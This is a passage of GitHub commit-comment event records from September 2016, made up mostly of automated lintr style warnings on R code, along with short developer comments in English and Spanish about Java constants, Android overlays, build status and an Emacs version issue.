^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T14:10:56Z"}
{"id":"4596495141","type":"CommitCommentEvent","actor":{"login":"gmdimitriz"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19114357,"position":null,"line":null,"path":null,"commit_id":"a521fbee97441d4f42b821780bdb41c171a433bb","created_at":"2016-09-21T14:10:58Z","updated_at":"2016-09-21T14:10:58Z","body":"Hi max, i home now its ok, thanks for your attention... but, like i said in some comments, alot of theese problems you have pointed is present in blueflyvario and other drivers...\r\n\r\nthanks"}},"created_at":"2016-09-21T14:10:58Z"}
{"id":"4596495357","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19114358,"position":null,"line":null,"path":null,"commit_id":"5c6087e38ee671ad5a3cf5aaa501d2a46af49872","created_at":"2016-09-21T14:10:59Z","updated_at":"2016-09-21T14:10:59Z","body":":postal_horn: :love_letter: "}},"created_at":"2016-09-21T14:10:59Z"}
{"id":"4596495573","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19114361,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T14:11:02Z","updated_at":"2016-09-21T14:11:02Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T14:11:02Z"}
{"id":"4596499038","type":"CommitCommentEvent","actor":{"login":"Chinipage"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114374,"position":26,"line":26,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:11:34Z","updated_at":"2016-09-21T14:11:34Z","body":"Si, tambien es valido, en Smalltalk nos manejamos con la regla \"Si es algo\nque podes calcular es un metodo, si es algo que necesitas persistir es un\natributo\", pero tambien es real que en Smalltalk no existen los atributos\n\"final\" asi que si en java se usa asi lo modificamos.\n\nEl 21 de septiembre de 2016, 11:04, 親日［しんニチ］ <notifications@github.com>\nescribió:\n\n> Entiendo la idea de hacer esto, que es por si en un futuro alguien decide\n> cambiar el nombre de una etiqueta, la podés cambiar una sola vez en lugar\n> de tener que cambiarla en todos lados donde la habías usado.\n>\n> Lo que me choca un poco es el hecho de hacer un método que lo único que\n> haga es devolver una cadena constante. ¿No sería mejor usar propiedades\n> estáticas constantes para esto en lugar de métodos? Me refiero a una cosa\n> así:\n>\n> public static final String PROGRAM_TAG = \"program\";public static final String PROFILE_TAG = \"profile\";\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Chinipage/tp-algoritmosComplejos/commit/6b28854dc1804e9d07b6eec42e8b91436eef0b00#commitcomment-19114233>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIM_ExboL7mqHJ_Cl1B1NwER8R8gbj1Gks5qsTmLgaJpZM4KC11->\n> .\n>\n"}},"created_at":"2016-09-21T14:11:34Z"}
{"id":"4596501000","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"xdevs23/android_frameworks_base-xos7-aosp"},"payload":{"comment":{"id":19114381,"position":null,"line":null,"path":null,"commit_id":"859456c9ac92372942ecf768908efc795f682393","created_at":"2016-09-21T14:11:52Z","updated_at":"2016-09-21T14:11:52Z","body":"It is somewhere as overlay, so i just put the missing stuff here **compatibility bro**"}},"created_at":"2016-09-21T14:11:52Z"}
{"id":"4596507146","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"xdevs23/android_frameworks_base-xos7-aosp"},"payload":{"comment":{"id":19114394,"position":null,"line":null,"path":null,"commit_id":"859456c9ac92372942ecf768908efc795f682393","created_at":"2016-09-21T14:12:45Z","updated_at":"2016-09-21T14:12:45Z","body":"bad hack bro"}},"created_at":"2016-09-21T14:12:45Z"}
{"id":"4596507235","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19114395,"position":null,"line":null,"path":null,"commit_id":"e327cf9988a6bcc0c65c5c2b1523368935ebaa64","created_at":"2016-09-21T14:12:46Z","updated_at":"2016-09-21T14:12:46Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1080](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13772&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T14:12:46Z"}
{"id":"4596510694","type":"CommitCommentEvent","actor":{"login":"chandan999"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":19114407,"position":null,"line":null,"path":null,"commit_id":"9bb69522ef399d0391a8f8d557531f483330c0fb","created_at":"2016-09-21T14:13:19Z","updated_at":"2016-09-21T14:13:19Z","body":"Calendar dashlet activities on dashboard is not displaying properly on correct date-time calender grid."}},"created_at":"2016-09-21T14:13:19Z"}
{"id":"4596510783","type":"CommitCommentEvent","actor":{"login":"mo7amd"},"repo":{"name":"mo7amd/MATLAB-MOOC"},"payload":{"comment":{"id":19114409,"position":null,"line":null,"path":null,"commit_id":"d213d2b547a41e53d928c989a49c01c91d13d8cc","created_at":"2016-09-21T14:13:20Z","updated_at":"2016-09-21T14:13:20Z","body":"merge local branch with remote one "}},"created_at":"2016-09-21T14:13:20Z"}
{"id":"4596510889","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19114410,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-21T14:13:20Z","updated_at":"2016-09-21T14:13:20Z","body":"@the-kenny, emacs 25 breaks several major modes I heavily depend on (such as haskell-mode), and now your commit actively prevents me from sticking to the older version until these issue have been resolved?!?! What am I supposed to do now?"}},"created_at":"2016-09-21T14:13:20Z"}
{"id":"4596524830","type":"CommitCommentEvent","actor":{"login":"Chinipage"},"repo":{"name":"Chinipage/tp-algoritmosComplejos"},"payload":{"comment":{"id":19114443,"position":26,"line":26,"path":"src/xqtr/model/Controller.java","commit_id":"6b28854dc1804e9d07b6eec42e8b91436eef0b00","created_at":"2016-09-21T14:15:30Z","updated_at":"2016-09-21T14:15:30Z","body":"Me volvi loco un rato con el tema de los nodos, resulta que cualquier cosa\ndel xml, sea un atributo, documento, elemento, blah, se puede representar\ncomo un nodo (calculo que hereda). El problema que tenia con nodo es que no\nentendia los mismos metodos que Elemento y era mas compicado buscar los\natributos y Elementos hijos. Te dejo el link que lei yo para ver los\ndiferentes tipos de nodo http://www.w3schools.com/xml/dom_nodetype.asp.\n\nEl 21 de septiembre de 2016, 11:10, Andres Martinez <andres93.lml@gmail.com>\nescribió:\n\n> Si, tambien es valido, en Smalltalk nos manejamos con la regla \"Si es algo\n> que podes calcular es un metodo, si es algo que necesitas persistir es un\n> atributo\", pero tambien es real que en Smalltalk no existen los atributos\n> \"final\" asi que si en java se usa asi lo modificamos.\n>\n> El 21 de septiembre de 2016, 11:04, 親日［しんニチ］ <notifications@github.com>\n> escribió:\n>\n>> Entiendo la idea de hacer esto, que es por si en un futuro alguien decide\n>> cambiar el nombre de una etiqueta, la podés cambiar una sola vez en lugar\n>> de tener que cambiarla en todos lados donde la habías usado.\n>>\n>> Lo que me choca un poco es el hecho de hacer un método que lo único que\n>> haga es devolver una cadena constante. ¿No sería mejor usar propiedades\n>> estáticas constantes para esto en lugar de métodos? Me refiero a una cosa\n>> así:\n>>\n>> public static final String PROGRAM_TAG = \"program\";public static final String PROFILE_TAG = \"profile\";\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/Chinipage/tp-algoritmosComplejos/commit/6b28854dc1804e9d07b6eec42e8b91436eef0b00#commitcomment-19114233>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AIM_ExboL7mqHJ_Cl1B1NwER8R8gbj1Gks5qsTmLgaJpZM4KC11->\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-21T14:15:30Z"}
{"id":"4596532187","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19114460,"position":null,"line":null,"path":null,"commit_id":"44ada21e1a7222e3876f501b55342b879eea0647","created_at":"2016-09-21T14:16:34Z","updated_at":"2016-09-21T14:16:34Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  